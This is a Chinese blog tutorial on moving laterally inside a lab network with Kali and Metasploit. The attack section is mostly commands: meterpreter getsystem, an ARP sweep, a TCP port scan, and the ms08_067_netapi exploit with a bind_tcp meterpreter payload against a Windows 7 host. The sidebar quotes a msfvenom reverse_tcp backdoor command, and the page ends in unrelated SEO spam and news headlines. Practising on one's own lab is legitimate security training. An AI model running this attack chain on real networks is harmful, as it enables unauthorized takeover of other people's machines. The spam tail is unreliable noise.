内网渗透 -- 获取内网中其他主机权限

68 篇文章 8 订阅
订阅专栏

 

每天早上醒来你有两个选择:一是盖上被子继续做你没做完的梦,二是掀开被子去完成你未完成的梦。。。

----  网易云热评

环境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.144

          小小受:win7 x64 ,ip:  192.168.1.130

 

一、生成木马及监听主机参考上篇文章:

 

 

二、获取小受的IP地址

meterpreter > getsystem

 

三、获取内网中存活的主机,以一台win03主机为例

meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24

 

 

四、端口扫描,看看小小受开放了那些端口

1、选择用到的模块:msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

2、查看需要配置的参数:show options

3、设置要扫描的端口:msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306

4、设置小小受ip地址:msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130

5、执行:msf5 auxiliary(scanner/portscan/tcp) > run   

 

 

                                

 

五、利用ms08_067漏洞拿下小小受   

1、搜索ms08_067模块信息

msf5 auxiliary(scanner/portscan/tcp) > search ms08_067

2、选择该模块并设置payload

msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

3、查看需要配置的参数:

msf5 exploit(windows/smb/ms08_067_netapi) > show options

4、设置目标主机并执行

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130

msf5 exploit(windows/smb/ms08_067_netapi) > run

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

 

 

 

 

 

 

ISC-内网渗透 -最终版.pdf
04-08
ISC-内网渗透 -最终版
内网渗透流程与思路和工具讲解
04-10
内网渗透测试的思路是首先收集目标网络的信息,然后探测目标网络主机存活情况,接着探测目标网络的开放端口情况,最后使用各种工具和方法来渗透目标网络。 在内网渗透测试,需要遵守相关的法律法规和道德...
内网渗透-实战|手把手教你如何进行内网渗透
最新发布
lza20001103的博客
04-14 1533
内网渗透-实战|手把手教你如何进行内网渗透
内网主机进行渗透并执行关机
max_ii_min的博客
03-01 2万+
1:渗透目标 查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击,渗透成功拿到会话后,执行一些命令。 2:准备阶段 2.1软件 Kali linux Windows XP SP3 Chinese - Simplified (NX) vmware 15 pro 2.2网络配置如下 Windows XP SP3 Chinese - Simplified (N...
内网安全内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
网络安全领域___专研者.
06-05 1990
内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或服务器上运行到内网穿透客户端,此时域名解析到的IP地址是局域网网关出口处的公网IP地址,再在网关处做端口映射指向监控设备即可.
获取目标内网入口
kun blog
04-28 285
渗透测试内网渗透学习,超详细
z099164的博客
07-04 3383
渗透测试内网渗透学习,超详细
目标攻击漏洞获取目标机器最高权限
jjxsir的博客
12-22 1644
目标攻击漏洞获取目标机器最高权限 目标站点 target: win7x64 192.168.123.1 60[DHCP] attack: kali-linux 192.168.123.136 方法一:通过web站点,使用无文件的方式攻去利用执行 方法二:通过web站点, 上传webshell,返回給msf 方法三:攻击其他端口服务,拿到meterpreterc 信息收集总在前- nmap端口扫描 root@kali:~# nmap -sV -T4 192.168.123.160 Starting Nmap
内网渗透讲义(1).pdf
06-30
渗透测试过程,我们经常会遇到以下场景:某处于域的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大...
pentest:内网渗透的一些工具及项目资料
04-07
内网渗透的一些工具及项目资料 入侵与渗透是两个不同的概念,很多人喜欢混为一谈,简单来说,入侵是从信息收集到打点,渗透是横向移动,获取目标,稳固权限。本页是针对内网渗透整理的一些工具以及项目资料,...
Linux内网渗透.doc
07-08
Linux 内网渗透是指在获取了 Linux 系统权限后,进一步渗透和攻击内网的技术。本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux ...
ListRDPConnections:C#读取本机对外RDP连接记录和其他主机主机的连接记录,从而内部网渗透获取更多可通内网网段信息以及定位运维管理人员主机
03-20
ListRDPConnections简介C#读取本机对外RDP连接记录和其他主机主机的连接记录,从而内部网渗透获取更多可通内网网段信息以及定位运维管理人员主机原理对外RDP连接记录对外RDP连接记录保存在HKEY_USERS\[SID]\...
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1848
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
看我如何快速拿下整个C段主机权限
渗透测试研究中心
01-24 454
0x01 前言Date/time:2015年,这次渗透测试发现已经拿下的几台机器的管理员密码存在一定规律性,最终通过分析密码规律、组合新密码成功拿下目标整个C段机器权限,个人感觉这是个不错的内网通用/规律密码实战案例,所以想着还是记录一下吧。0x02 Getshell过程网站基本信息探测:目标站点:http://www.that****elos.com.br 服务器IP:189.**.**.2...
kali linux查看局域网下所有IP,并对指定IP攻击
weixin_44145452的博客
08-18 3939
因为自己的小米手机也连接到了同一个wifi下面,所以正好发现这里所嗅探到的ip地址:192.168.1.136是我手机的ip地址,与其刚好符合。kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击。前面的ip地址是手机的ip地址,后面的那个ip地址是手机的默认网关地址。来确认本机的ip地址。这样这个攻击就停止了。
Kali渗透测试之六提升权限
服务猿
05-12 3363
◆提升权限获取目标系统的控制权是渗透成功的标志。审计人员也可以使用适用于目标系统的本地漏洞来提升自己的权限,只要他们能够在目标系统上运行提权漏洞利用程序,就可以获得主机上的超级用户权限或者系统级权限。审计人员还可以以该主机为跳板进一步攻击局域网络。(审计人员可能以各种方式获得与被控制系统有关的更多信息,具体地说,他们可能使用嗅探手段截获网络数据包,破解各种服务的密码,在局域网使用网络欺骗手段...
利用kali下的msfvenom入侵电脑
热门推荐
qq_41453632的博客
10-28 3万+
需要的工具:msfvenom . msfconsole (kali里面有) msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=本地ip  LPORT=本地端口号 –f exe –o 文件名.exe 即生成一个后门文件xss.exe(我这里是将文件名命名为xss的) 然后继续执行命令: msfconsole          (...
模拟黑客使用Kali Linux远程控制Windows(互联网)
HKBlackeagle的专栏
01-29 3122
通过内网穿透实现kali控制windows
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的网络隧道,可以用于在内网环境进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息的域名字段来传输数据。 在DNS隧道,攻击者利用内网一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求的域名字段。外部DNS服务器接收到DNS请求消息后,解析出其的数据,再将数据封装成DNS响应消息返回给内网主机内网主机收到DNS响应消息后,解析出其的数据,实现数据传输。 DNS隧道的优点是可以绕过内网防火墙和其他安全设备的检测,可以在内网环境进行数据传输,而不被发现。但是,DNS隧道也存在一些缺点,例如传输速度较慢,数据传输量受限等。 为了防范DNS隧道攻击,内网环境可以采取以下措施: 1. 禁止内网主机直接访问外部DNS服务器,只允许内网主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应的域名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • 图形化渗透测试工具 -- GUI_Tools 27027
  • 网络安全单兵工具 -- YAKIT 26966
  • 2021Kali系列 -- 目录扫描(Dirbuster) 22590
  • GOBY扫描篇 18088
  • 漏洞扫描工具 -- awvs13 15095

分类专栏

  • 2024逆向学习
  • 2024安卓逆向 2篇
  • 网络爬虫 57篇
  • 2024游戏辅助 11篇
  • web安全工具库 175篇
  • 2023Python学习 30篇
  • C++ 20篇
  • 2023web安全工具库 5篇
  • JS逆向 28篇
  • 安卓逆向 45篇
  • 2023爬虫逆向 59篇
  • windows逆向 28篇
  • 火山中文编程 27篇
  • 小课堂 107篇
  • MFC 43篇
  • 游戏辅助 7篇
  • C语言 40篇
  • 2021BurpSuite 9篇
  • MySQL注入 8篇
  • 从PHP开始学渗透 7篇
  • win32编程 23篇
  • 某教程学习笔记 68篇
  • 从建站到拿站 8篇

最新评论

  • Python中精通异常日志记录

    北风之神c: 总结的很全面,写得赞,博主用心了。 此国产日志 https://nb-log-doc.readthedocs.io/zh_CN/latest 使用原生 loggng封装,兼容性和替换性100%,大幅简化logging的使用。 1、日志能根据级别能够自动变彩色。 1 2、print自动变彩色。 3、日志和print在pycahrm控制台的输出都自动可以点击跳转到文件和行号。 4、多进程日志切割安全,文件日志写入性能高 。 5、入参简单,能一键自动记录到多种地方。 6、 兼容 loguru模式。 相比 loguru 有10胜。 pip install nb_log 。

  • Metasploit6.0系列教程 -- 渗透Joomla网站

    2201_76029893: 为啥run不出来版本信息表情包

  • Python中赋值使地址一样的技术探究

    普通网友: 大佬的文章写的太精辟了 让我深刻了解了这篇文章的精髓 谢谢大佬分享,希望继续创作优质博文。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】

  • 游戏辅助 -- 某游戏一键端配置

    普通网友: 阅读这篇博文真是一次愉快的体验!作者的文字真是动人心弦,语言精准而生动。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】

  • 探索图像边缘:使用Python进行轮廓检测

    普通网友: 阅读这篇博文真是一次愉快的体验!作者的文字真是动人心弦,语言精准而生动。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】

大家在看

  • 【Python】数据处理:Matplotlib绘图 491
  • MPC质心跟随控制(CoM Tracking Control)
  • 高频交易解决方案:快捷支付
  • Preperties和Filelds区别是啥 300
  • 【算法题】搜索二维矩阵,一文彻底弄会! 120

最新文章

  • 数据结构篇:链表和树结构的操作方法
  • 数据结构篇:旋转操作在AVL树中的实现过程
  • 数据结构篇:树形数据结构的基本概念及其遍历方法
2024
06月 4篇
05月 10篇
04月 23篇
03月 2篇
02月 27篇
01月 8篇
2023年161篇
2022年72篇
2021年213篇
2020年234篇
2019年66篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

深圳SEO优化公司布吉关键词排名包年推广哪家好西乡seo网站推广多少钱池州模板网站建设推荐长沙至尊标王哪家好上海网站优化排名价格大丰网站改版推荐阳泉设计网站多少钱安康企业网站设计报价合肥关键词按天收费多少钱菏泽阿里店铺运营报价遂宁seo排名甘南网站优化按天收费价格毕节设计网站价格张掖网站制作设计价格日照网站改版公司迁安SEO按天计费公司同乐网络推广价格衡阳外贸网站建设价格濮阳网站定制朝阳推广网站价格松岗英文网站建设价格新余阿里店铺托管报价文山高端网站设计大丰阿里店铺托管推荐西乡网站制作推荐连云港网络广告推广公司营口百度网站优化排名梅州百度网站优化报价泰安seo网站推广推荐丽水百搜标王歼20紧急升空逼退外机英媒称团队夜以继日筹划王妃复出草木蔓发 春山在望成都发生巨响 当地回应60岁老人炒菠菜未焯水致肾病恶化男子涉嫌走私被判11年却一天牢没坐劳斯莱斯右转逼停直行车网传落水者说“没让你救”系谣言广东通报13岁男孩性侵女童不予立案贵州小伙回应在美国卖三蹦子火了淀粉肠小王子日销售额涨超10倍有个姐真把千机伞做出来了近3万元金手镯仅含足金十克呼北高速交通事故已致14人死亡杨洋拄拐现身医院国产伟哥去年销售近13亿男子给前妻转账 现任妻子起诉要回新基金只募集到26元还是员工自购男孩疑遭霸凌 家长讨说法被踢出群充个话费竟沦为间接洗钱工具新的一天从800个哈欠开始单亲妈妈陷入热恋 14岁儿子报警#春分立蛋大挑战#中国投资客涌入日本东京买房两大学生合买彩票中奖一人不认账新加坡主帅:唯一目标击败中国队月嫂回应掌掴婴儿是在赶虫子19岁小伙救下5人后溺亡 多方发声清明节放假3天调休1天张家界的山上“长”满了韩国人?开封王婆为何火了主播靠辱骂母亲走红被批捕封号代拍被何赛飞拿着魔杖追着打阿根廷将发行1万与2万面值的纸币库克现身上海为江西彩礼“减负”的“试婚人”因自嘲式简历走红的教授更新简介殡仪馆花卉高于市场价3倍还重复用网友称在豆瓣酱里吃出老鼠头315晚会后胖东来又人满为患了网友建议重庆地铁不准乘客携带菜筐特朗普谈“凯特王妃P图照”罗斯否认插足凯特王妃婚姻青海通报栏杆断裂小学生跌落住进ICU恒大被罚41.75亿到底怎么缴湖南一县政协主席疑涉刑案被控制茶百道就改标签日期致歉王树国3次鞠躬告别西交大师生张立群任西安交通大学校长杨倩无缘巴黎奥运

深圳SEO优化公司 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化